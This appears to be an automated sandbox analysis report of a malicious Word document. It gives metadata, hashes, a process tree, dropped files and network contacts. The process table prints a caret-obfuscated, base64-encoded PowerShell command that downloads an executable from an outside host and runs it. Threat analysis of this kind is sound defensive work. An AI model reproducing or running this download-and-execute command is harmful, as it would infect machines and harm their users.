File name: | Logisticaservicesrl.doc.mal |
Full analysis: | https://app.any.run/tasks/ae6f20eb-849a-47c6-96cb-76beb0be9df1 |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 11:07:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Enhanced non-volatile productivity, Subject: Illinois Jerel, Comments: Fundamental non-volatile matrices, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Thu Nov 8 06:33:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 4E8B385A8103D0970B63AEFD06C78623 |
SHA1: | 8D9C9A8D24FF4E41C19C8583E3C5C48DB52F147E |
SHA256: | B8CE8DE4427E40137DC3E232B0502C71DFDC8BA39FD408D2FE35791B367A8FF6 |
SSDEEP: | 1536:RIzUtHxmr1gExu7ZhjC1yhyCKmwjT0dV3w:2zhPwhjC1O9+g |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Bytes: | 95744 |
Company: | - |
Manager: | - |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:11:08 06:33:00 |
CreateDate: | 2018:04:25 21:21:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal |
Comments: | Fundamental non-volatile matrices |
Keywords: | - |
Author: | - |
Subject: | Illinois Jerel |
Title: | Enhanced non-volatile productivity |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Logisticaservicesrl.doc.mal.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2796 | CMd.eXe /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^y^A^G^8^A^a^Q^B^k^A^G^w^A^Y^Q^B^u^A^G^Q^A^Z^Q^B^2^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^X^A^E^U^A^U^w^A^v^A^G^Y^A^Y^Q^B^0^A^G^8^A^Z^w^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^c^A^e^Q^B^u^A^G^M^A^N^w^A^u^A^H^g^A^Y^Q^B^w^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^B^j^A^D^U^A^Y^w^A^w^A^D^I^A^Y^w^A^5^A^D^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^A^g^A^F^M^A^d^A^B^h^A^H^I^A^d^A^A^t^A^F^A^A^c^g^B^v^A^G^M^A^Z^Q^B^z^A^H^M^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^o^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^n^A^F^w^A^Y^w^A^1^A^G^M^A^M^A^A^y^A^G^M^A^O^Q^A^1^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^7^A^C^A^A^R^Q^B^4^A^G^k^A^d^A^A^= | C:\Windows\system32\CMd.eXe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
184 | poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwByAG8AaQBkAGwAYQBuAGQAZQB2AC4AYwBvAG0ALwBXAEUAUwAvAGYAYQB0AG8AZwAuAHAAaABwAD8AbAA9AHcAeQBuAGMANwAuAHgAYQBwACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABjADUAYwAwADIAYwA5ADUALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwAYwA1AGMAMAAyAGMAOQA1AC4AZQB4AGUAJwA7ACAARQB4AGkAdAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMd.eXe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR95D3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHCGVVYW0X9LGVTJP07M.temp | — | |
MD5:— | SHA256:— | |||
184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:DD5121C5BC6EED5D50BCA8A00D5B55F0 | SHA256:F4B92F49BD3F0A679B9CE3417BBEBB348E59BDAE0862D361446C57CE7A9164CF | |||
184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da6ea.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2296 | WINWORD.EXE | C:\Users\admin\Desktop\~$gisticaservicesrl.doc.mal.doc | pgc | |
MD5:23B0EDF8508AD9D4CF8D8194A418808C | SHA256:C60666B82083D9DCBDD30401F738DCC1A3844455C16EF54A2022F1E26E6D4805 | |||
2296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Logisticaservicesrl.doc.mal.doc.LNK | lnk | |
MD5:0DA102BE37AEA502A2710790482BF0E9 | SHA256:9A263226188EC022EBD270102D6D16D13488106AB2277659F1AD8A4422767B64 | |||
2296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:DEB7AA3518FF502862D3104D1E37087B | SHA256:59D7CA1CD051FADB9C41AD2102B496093DD70BA10A1BEC8AC1C76FB86F8E97DE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
184 | powershell.exe | GET | — | 185.180.198.222:80 | http://roidlandev.com/WES/fatog.php?l=wync7.xap | US | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
184 | powershell.exe | 185.180.198.222:80 | roidlandev.com | Hosting Solution Ltd. | US | unknown |
Domain | IP | Reputation |
---|---|---|
roidlandev.com |
| unknown |